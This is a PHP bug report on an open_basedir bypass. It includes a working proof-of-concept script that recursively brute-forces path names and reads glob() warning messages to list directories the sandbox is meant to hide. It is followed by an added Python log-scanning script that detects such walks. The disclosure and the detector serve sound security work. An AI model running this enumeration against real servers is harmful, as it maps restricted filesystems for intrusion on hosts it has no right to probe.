From:             anton dot kirsanov at gmail dot com
Operating system: ALL
PHP version:      5.1.6
PHP Bug Type:     Safe Mode/open_basedir
Bug description:  Bug in warning message when glob() function accesses an unallowed path.
Description:
------------
When open_basedir is enabled, the glob() function doesn't show files in unallowed directories; however, the warning message contains the name of the file or directory to which access is denied. If you recursively parse the warning messages to extract paths, you get a listing of the unallowed directories (see POC code). I tested this bug on PHP 5.1.6 and 4.4.4; the result is the same everywhere.

Reproduce code:
---------------
<?php
// -----------------------------------------------------
// POC by Kirsanov Anton ( anton.kirsanov[at]gmail.com )
//
// Description:
// A bug in the warning message of the glob() function allows listing
// unallowed directories when open_basedir is enabled.
//
// Risk:
// Possible directory listing when open_basedir is enabled.
// Tested on PHP 4.4.4, 5.1.6.

error_reporting(E_ALL);
ini_set("display_errors", 0);
ini_set("track_errors", 1);   // makes the last warning available in $php_errormsg

if (!ini_get('open_basedir')) die('open_basedir not present');

// candidate characters for the next position of the path name
$chars = "._-1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$z = array();

get_c("/", $z); // show contents of root directory
print_r($z);

function get_c($path, &$o)
{
    global $chars;
    for ($i = 0; $i < strlen($chars); $i++) {
        $p = $path . $chars[$i];
        $r = glob($p . "*");
        // glob() returns nothing, but the open_basedir / safe_mode warning
        // names the path that was denied
        if (!$r && !empty($php_errormsg)) {
            if ((preg_match("/open\_basedir restriction in effect\. File\((.*)\) is/iU", $php_errormsg, $t)
                 || preg_match("/is not allowed to access (.*) owned/iU", $php_errormsg, $t))
                && !isset($o[$t[1]])) {
                $o[$t[1]] = $t[1];   // record the disclosed path and descend into it
                get_c($p, $o);
            }
        }
    }
}
?>

Expected result:
----------------
<?php glob("/*"); ?>

Warning: glob(): open_basedir restriction in effect. is not allowed to access (/) owned ...

Actual result:
--------------
<?php glob("/*"); ?>
----
Warning: glob(): open_basedir restriction in effect. is not allowed to access (/bin/) owned ...
----
The warning message has disclosed the path /bin/.

-- 
Edit bug report at http://bugs.php.net/?id=39339&edit=1
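The walk described in the report leaves a distinctive trace in the server's PHP error log: a burst of open_basedir warnings whose denied paths grow one character at a time. The following Python script is an added detection example, not code from the bug report; the log lines are constructed in PHP's default log_errors format, and the flagging threshold is an assumed tuning value.

```python
import re
from collections import defaultdict

# Constructed sample of a PHP error_log (not taken from the bug report);
# the line format follows PHP's default log_errors output.
SAMPLE_LOG = """\
[03-Nov-2006 12:00:01] PHP Warning:  glob(): open_basedir restriction in effect. File(/a) is not within the allowed path(s): (/var/www) in /var/www/poc.php on line 22
[03-Nov-2006 12:00:01] PHP Warning:  glob(): open_basedir restriction in effect. File(/b) is not within the allowed path(s): (/var/www) in /var/www/poc.php on line 22
[03-Nov-2006 12:00:01] PHP Warning:  glob(): open_basedir restriction in effect. File(/bi) is not within the allowed path(s): (/var/www) in /var/www/poc.php on line 22
[03-Nov-2006 12:00:02] PHP Warning:  glob(): open_basedir restriction in effect. File(/bin) is not within the allowed path(s): (/var/www) in /var/www/poc.php on line 22
[03-Nov-2006 12:00:02] PHP Warning:  glob(): open_basedir restriction in effect. File(/e) is not within the allowed path(s): (/var/www) in /var/www/poc.php on line 22
[03-Nov-2006 12:05:00] PHP Warning:  fopen(): open_basedir restriction in effect. File(/tmp/x) is not within the allowed path(s): (/var/www) in /var/www/upload.php on line 8
"""

# Pull the denied path and the offending script out of one log line.
LINE_RE = re.compile(
    r"open_basedir restriction in effect\. File\((?P<path>[^)]*)\) is not within"
    r".* in (?P<script>\S+) on line \d+"
)

def denied_paths_by_script(log_text):
    """Map each script to the paths it was denied, in log order."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            hits[m.group("script")].append(m.group("path"))
    return dict(hits)

def prefix_walk_count(paths):
    """Count denied paths that extend another denied path (or a directory)
    by exactly one character: /b, /bi, /bin is the signature of a
    character-by-character walk; a single stray /tmp/x is not."""
    seen = set(paths)
    return sum(1 for p in seen if p[:-1] in seen or p[:-1].endswith("/"))

def flag_enumeration(log_text, threshold=4):
    """Return {script: walk_count} for scripts at or above the threshold.
    The threshold is an assumed tuning value, not from the report."""
    flagged = {}
    for script, paths in denied_paths_by_script(log_text).items():
        count = prefix_walk_count(paths)
        if count >= threshold:
            flagged[script] = count
    return flagged
```

Run against a real error_log, a hit names the tenant script to inspect; the lasting fix is the corrected PHP build, since the script under test is the one choosing whether warnings are tracked.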